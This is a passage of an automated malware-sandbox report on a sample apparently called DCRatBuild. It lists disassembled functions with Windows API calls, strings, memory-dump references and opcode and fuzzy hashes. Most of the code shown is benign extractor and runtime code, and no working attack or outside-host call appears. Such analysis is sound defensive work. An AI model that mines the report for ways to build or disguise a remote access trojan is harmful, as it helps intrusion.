                      • Opcode Fuzzy Hash: 35e6dc4fc9eb043d3c2b51b8d19b4ad318d5145e06010545b9193a033bb53c7e
                      • Instruction Fuzzy Hash: F401C433640316A6C71067689C16E7FBB6AEBC1B52F088015FD08E7291EA718C1596B2
                      Function 00D7CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                        • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                      • EndDialog.USER32(?,00000001), ref: 00D7CCDB
                      • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00D7CCF1
                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D7CD05
                      • SetDlgItemTextW.USER32(?,00000068), ref: 00D7CD14
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ItemText$DialogWindow
                      • String ID: RENAMEDLG
                      • API String ID: 445417207-3299779563
                      • Opcode ID: 4b5da50913fbc1179fd6569e54576b1f6b0b8c44478a681c58398049e44c428f
                      • Instruction ID: 681e6dfd1703c0f329b4772ded3b322555ab757683c14ac7c8d13a11dd004106
                      • Opcode Fuzzy Hash: 4b5da50913fbc1179fd6569e54576b1f6b0b8c44478a681c58398049e44c428f
                      • Instruction Fuzzy Hash: 13019C33294312BFD2224F259C08FA73B5CEB4A702F148019F38EE21E1D7A19804C731
                      Function 00D875C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D87573,00000000,?,00D87513,00000000,00D9BAD8,0000000C,00D8766A,00000000,00000002), ref: 00D875E2
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D875F5
                      • FreeLibrary.KERNEL32(00000000,?,?,?,00D87573,00000000,?,00D87513,00000000,00D9BAD8,0000000C,00D8766A,00000000,00000002), ref: 00D87618
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: a324c1eac8556319c5823ad9c4c9c56697a0725d9ee8fc179b9d4811a632cb21
                      • Instruction ID: 4075cd9c47e8252c1a622f0fe22624170a4ab56496ad7981352e1fe800178794
                      • Opcode Fuzzy Hash: a324c1eac8556319c5823ad9c4c9c56697a0725d9ee8fc179b9d4811a632cb21
                      • Instruction Fuzzy Hash: F4F04430A0461CBBDB15AF54DC0AB9DBFB9EF04715F14416AF809E2260EB318E44CB74
                      Function 00D6EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D70085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D700A0
                        • Part of subcall function 00D70085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D6EB86,Crypt32.dll,00000000,00D6EC0A,?,?,00D6EBEC,?,?,?), ref: 00D700C2
                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D6EB92
                      • GetProcAddress.KERNEL32(00DA81C0,CryptUnprotectMemory), ref: 00D6EBA2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: AddressProc$DirectoryLibraryLoadSystem
                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                      • API String ID: 2141747552-1753850145
                      • Opcode ID: 1397f57098561922d725ddd8ea0bcd655dbcd9d20d4dc89aaeb6e39210ec2366
                      • Instruction ID: 156a39994be617e21082af6f2ffd6e6b7970c1446ab25fa66627276f0493932f
                      • Opcode Fuzzy Hash: 1397f57098561922d725ddd8ea0bcd655dbcd9d20d4dc89aaeb6e39210ec2366
                      • Instruction Fuzzy Hash: ADE04678800751AFCF209F3D9808B42BFE4AB14710B04C81EE4DAE3280EAB5D5888F70
                      Function 00D87DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _free
                      • String ID:
                      • API String ID: 269201875-0
                      • Opcode ID: 0a433a998a3126ee3a88e58039c96b57fcd84a2782a67e8663c6a4ad8dd293a0
                      • Instruction ID: a26ea2aa57907dac0bc7edceb1f6e1d83abe4507eda251acc7f56da3c284774e
                      • Opcode Fuzzy Hash: 0a433a998a3126ee3a88e58039c96b57fcd84a2782a67e8663c6a4ad8dd293a0
                      • Instruction Fuzzy Hash: D441A332A003049FDB25EF78C881A5EB7B6EF89714F6545A9E515EB341EB31ED01CBA0
                      Function 00D8B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                      Download Yara Rule
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 00D8B619
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D8B63C
                        • Part of subcall function 00D88518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D8B662
                      • _free.LIBCMT ref: 00D8B675
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D8B684
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                      • String ID:
                      • API String ID: 336800556-0
                      • Opcode ID: d022cc88dc3975812c7f290c016deda6878cc55d015ac5b35a48af3d4f1dd831
                      • Instruction ID: 92e238de642403accd595decf680bec1ba5bf7d963aaf6d5e785ba89cde9803b
                      • Opcode Fuzzy Hash: d022cc88dc3975812c7f290c016deda6878cc55d015ac5b35a48af3d4f1dd831
                      • Instruction Fuzzy Hash: 650175A2601715BB632126B65C49C7B6A6DDEC6BB1319022BB904D6210EF60CD0192B4
                      Function 00D89029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(?,00DA0EE8,00000200,00D8895F,00D858FE,?,?,?,?,00D6D25E,?,02F435F8,00000063,00000004,00D6CFE0,?), ref: 00D8902E
                      • _free.LIBCMT ref: 00D89063
                      • _free.LIBCMT ref: 00D8908A
                      • SetLastError.KERNEL32(00000000,00D93958,00000050,00DA0EE8), ref: 00D89097
                      • SetLastError.KERNEL32(00000000,00D93958,00000050,00DA0EE8), ref: 00D890A0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ErrorLast$_free
                      • String ID:
                      • API String ID: 3170660625-0
                      • Opcode ID: 24fa8e5df8fa9c4fda14b7b7d5a99066bd51af2ba54eff4f0efe24e60577a30d
                      • Instruction ID: 080bea547649883323336b90d84bfa12bb5b89632be34a115edf02345160af78
                      • Opcode Fuzzy Hash: 24fa8e5df8fa9c4fda14b7b7d5a99066bd51af2ba54eff4f0efe24e60577a30d
                      • Instruction Fuzzy Hash: 9601F476505B006A93227B396C96E3BA76EDBC137172C012AF589D2392EF61CC016370
                      Function 00D7075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D70A41: ResetEvent.KERNEL32(?), ref: 00D70A53
                        • Part of subcall function 00D70A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00D70A67
                      • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00D7078F
                      • CloseHandle.KERNEL32(?,?), ref: 00D707A9
                      • DeleteCriticalSection.KERNEL32(?), ref: 00D707C2
                      • CloseHandle.KERNEL32(?), ref: 00D707CE
                      • CloseHandle.KERNEL32(?), ref: 00D707DA
                        • Part of subcall function 00D7084E: WaitForSingleObject.KERNEL32(?,000000FF,00D70A78,?), ref: 00D70854
                        • Part of subcall function 00D7084E: GetLastError.KERNEL32(?), ref: 00D70860
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                      • String ID:
                      • API String ID: 1868215902-0
                      • Opcode ID: 0a819dd551641b590d091efcca18852ae51a343db6f68b8e993f970e0b0778ca
                      • Instruction ID: 6390b166a34c2e5d336d49015376f2b3d3a535cf3b4ed7f632a1de1dffd0f67a
                      • Opcode Fuzzy Hash: 0a819dd551641b590d091efcca18852ae51a343db6f68b8e993f970e0b0778ca
                      • Instruction Fuzzy Hash: 24015E72540704EFCB229F69DD85F86BBE9FB49710F00452AF16E822A4DB756A44CBB0
                      Function 00D8BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • _free.LIBCMT ref: 00D8BF28
                        • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958), ref: 00D884F4
                        • Part of subcall function 00D884DE: GetLastError.KERNEL32(00D93958,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958,00D93958), ref: 00D88506
                      • _free.LIBCMT ref: 00D8BF3A
                      • _free.LIBCMT ref: 00D8BF4C
                      • _free.LIBCMT ref: 00D8BF5E
                      • _free.LIBCMT ref: 00D8BF70
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 26242d9ebfd96779cf651a062f13f20a7438bbb1893404d1c7b85766449d35e0
                      • Instruction ID: 44d1bf2554cfa37d23cd3a5bb42f2da04a0c792b9fb9d18c48a672a6d95f6a01
                      • Opcode Fuzzy Hash: 26242d9ebfd96779cf651a062f13f20a7438bbb1893404d1c7b85766449d35e0
                      • Instruction Fuzzy Hash: 57F0AF73508205AB8620FB68EE86C1A77DAFE047607A84806F549D7A55CF35FC819BB4
                      Function 00D88060 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                      Download Yara Rule
                      APIs
                      • _free.LIBCMT ref: 00D8807E
                        • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958), ref: 00D884F4
                        • Part of subcall function 00D884DE: GetLastError.KERNEL32(00D93958,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958,00D93958), ref: 00D88506
                      • _free.LIBCMT ref: 00D88090
                      • _free.LIBCMT ref: 00D880A3
                      • _free.LIBCMT ref: 00D880B4
                      • _free.LIBCMT ref: 00D880C5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 08e845c3b654f8f1526de8e0b020c7c4b8ea291eea4e35abb0a58479f904fc22
                      • Instruction ID: 3fee461336e5da61cdc9c96908afee0cab5454a41c6dc1abc84e3ef2abf8a095
                      • Opcode Fuzzy Hash: 08e845c3b654f8f1526de8e0b020c7c4b8ea291eea4e35abb0a58479f904fc22
                      • Instruction Fuzzy Hash: A5F0177E8013378B9711BB19BC028197B66F716720348470AF410D6B72CB310861AFF5
                      Function 00D67574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                      Download Yara Rule
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D67579
                        • Part of subcall function 00D63B3D: __EH_prolog.LIBCMT ref: 00D63B42
                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00D67640
                        • Part of subcall function 00D67BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D67C04
                        • Part of subcall function 00D67BF5: GetLastError.KERNEL32 ref: 00D67C4A
                        • Part of subcall function 00D67BF5: CloseHandle.KERNEL32(?), ref: 00D67C59
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                      • API String ID: 3813983858-639343689
                      • Opcode ID: eecbc157927e8a3a37f9a25ba7d4fd9c3663ed0efb9b6be9d1a783ca55634de8
                      • Instruction ID: 3339d29a7f56e7b17e4a5945cbcb5fe9a03c7f638df5cc64ebf263f604f7baeb
                      • Opcode Fuzzy Hash: eecbc157927e8a3a37f9a25ba7d4fd9c3663ed0efb9b6be9d1a783ca55634de8
                      • Instruction Fuzzy Hash: 9D317071908249AFDF20EBA8DC41BEEBB69EF15358F048055F449E7292DB744A44CB71
                      Function 00D7A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                        • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                      • EndDialog.USER32(?,00000001), ref: 00D7A4B8
                      • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00D7A4CD
                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D7A4E2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ItemText$DialogWindow
                      • String ID: ASKNEXTVOL
                      • API String ID: 445417207-3402441367
                      • Opcode ID: d1ff05f600aee178bcae8318bb17a1c2414fe742bf58c34e7ae3cb5eb1d2b9ec
                      • Instruction ID: 7920f50b5f7a6272c662504805992e69cfe52b42d685ad9abc653b153e30f228
                      • Opcode Fuzzy Hash: d1ff05f600aee178bcae8318bb17a1c2414fe742bf58c34e7ae3cb5eb1d2b9ec
                      • Instruction Fuzzy Hash: B311D632244302AFD7219F6C9D0DF6A3B69EB86305F184005F34DDB1A0D7A29D11D736
                      Function 00D6D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: __fprintf_l_strncpy
                      • String ID: $%s$@%s
                      • API String ID: 1857242416-834177443
                      • Opcode ID: 9934f6f30900b458e4df4970a6e5f05098c80045a27677814bcfb8c284bb0818
                      • Instruction ID: c35d67a273df8df1feb2d1f70cae6971f4c089765bed1f4c7ae738a104c6ca49
                      • Opcode Fuzzy Hash: 9934f6f30900b458e4df4970a6e5f05098c80045a27677814bcfb8c284bb0818
                      • Instruction Fuzzy Hash: 47216F72940348AFDF20DEA4EC06FEE7BA9EF09300F040512FE1496191E371DA599B75
                      Function 00D7A990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                        • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                      • EndDialog.USER32(?,00000001), ref: 00D7A9DE
                      • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00D7A9F6
                      • SetDlgItemTextW.USER32(?,00000067,?), ref: 00D7AA24
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ItemText$DialogWindow
                      • String ID: GETPASSWORD1
                      • API String ID: 445417207-3292211884
                      • Opcode ID: 883aa8bfc55ef2364cd6db62a0fece17018e7be2553af1d7c68c1b78611c3b25
                      • Instruction ID: 6add612976dcfd769fdf60df70d2ac37941b50305c0ded6ca73ef96bf6196d53
                      • Opcode Fuzzy Hash: 883aa8bfc55ef2364cd6db62a0fece17018e7be2553af1d7c68c1b78611c3b25
                      • Instruction Fuzzy Hash: 9A114833940219BBDB219A689D09FFE773CEB89310F044011FB89F2180E261DD51DB72
                      Function 00D6B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                      • _swprintf.LIBCMT ref: 00D6B51E
                        • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                      • _wcschr.LIBVCRUNTIME ref: 00D6B53C
                      • _wcschr.LIBVCRUNTIME ref: 00D6B54C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _wcschr$__vswprintf_c_l_swprintf
                      • String ID: %c:\
                      • API String ID: 525462905-3142399695
                      • Opcode ID: 00608b110025e12610f955855194b2605963fc497eaf323395b71b4dc2659974
                      • Instruction ID: c7cd015a18e968747e2972075988943c5fdbdffa9d180b2024c94c7791f786c7
                      • Opcode Fuzzy Hash: 00608b110025e12610f955855194b2605963fc497eaf323395b71b4dc2659974
                      • Instruction Fuzzy Hash: 7201D263914311ABCB20ABA59C82CABB7ACEE957B07544417F986C6081FB20D984C3B1
                      Function 00D706BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                      Download Yara Rule
                      APIs
                      • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00D6ABC5,00000008,?,00000000,?,00D6CB88,?,00000000), ref: 00D706F3
